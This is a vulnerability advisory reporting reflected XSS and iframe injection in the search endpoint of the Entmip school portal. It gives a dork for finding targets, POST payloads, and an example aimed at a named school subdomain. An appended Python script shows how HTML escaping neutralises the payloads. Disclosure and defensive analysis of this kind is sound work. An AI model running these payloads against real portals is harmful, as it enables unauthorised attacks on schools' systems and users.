Entmip Reflected XSS & Iframe injection

2016.12.19
Implosion (US)
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

----------------------------------------------------------------------
[Description]
#Exploit title: Entmip Reflected XSS & Iframe injection
#Exploit author: Implosion
#Date: 18/12/2016
#Dorks: site:.entmip.fr -site:www.xxx.com
#Website: entmip.fr
#Tested on: Firefox
----------------------------------------------------------------------
[Vulnerability][Reflected XSS]
#URL: http://XXXXXX.entmip.fr/sg.do
#POST DATA: %23ECRAN_LOGIQUE%23=RECHERCHE&PROC=RECHERCHE&ACTION=VALIDER&CODE_ETABLISSEMENT=XXXX&QUERY="><script>alert('1')</script>+&x=0&y=0
----------------------------------------------------------------------
[Vulnerability][Iframe Injection]
#URL: http://XXXXXX.entmip.fr/sg.do
#POST DATA: %23ECRAN_LOGIQUE%23=RECHERCHE&PROC=RECHERCHE&ACTION=VALIDER&CODE_ETABLISSEMENT=XXXX&QUERY="><iframe src=https://cxsecurity.com>+&x=0&y=0
----------------------------------------------------------------------
[Example]
#URL: http://labarousse.entmip.fr/sg.do
#POST DATA: %23ECRAN_LOGIQUE%23=RECHERCHE&PROC=RECHERCHE&ACTION=VALIDER&CODE_ETABLISSEMENT=6469&QUERY="><script>alert('1')</script>%2B&x=0&y=0
----------------------------------------------------------------------
#Discovered By Implosion
----------------------------------------------------------------------
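
Both payloads start with `">`, which suggests QUERY is echoed unescaped into a double-quoted HTML attribute. The following is an added example, not code from the advisory or from Entmip: it assumes a hypothetical search-box template (`render_vulnerable`, `render_hardened`) and shows which elements each POST body injects and that HTML-encoding the value on output removes them while keeping the search text intact.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs

# POST bodies as given in the advisory (establishment code left as XXXX).
PREFIX = ("%23ECRAN_LOGIQUE%23=RECHERCHE&PROC=RECHERCHE&ACTION=VALIDER"
          "&CODE_ETABLISSEMENT=XXXX&QUERY=")
SUFFIX = "+&x=0&y=0"
BODIES = {
    "xss": PREFIX + "\"><script>alert('1')</script>" + SUFFIX,
    "iframe": PREFIX + '"><iframe src=https://cxsecurity.com>' + SUFFIX,
}

# Assumption: the results page echoes QUERY back into the search box.
def render_vulnerable(query):
    return '<input type="text" name="QUERY" value="' + query + '">'

def render_hardened(query):
    # Encode & < > " ' so the value cannot close the attribute or open a tag.
    escaped = html.escape(query, quote=True)
    return '<input type="text" name="QUERY" value="' + escaped + '">'

class TagCollector(HTMLParser):
    """Records every start tag and every value="..." attribute seen."""
    def __init__(self):
        super().__init__()
        self.tags = []
        self.values = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.values += [v for k, v in attrs if k == "value"]

def analyse(body, render):
    """Return (elements injected besides <input>, value attribute == user input)."""
    query = parse_qs(body, keep_blank_values=True)["QUERY"][0]
    collector = TagCollector()
    collector.feed(render(query))
    collector.close()
    injected = [t for t in collector.tags if t != "input"]
    return injected, collector.values == [query]

if __name__ == "__main__":
    for name, body in BODIES.items():
        for render in (render_vulnerable, render_hardened):
            print(name, render.__name__, analyse(body, render))
```
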

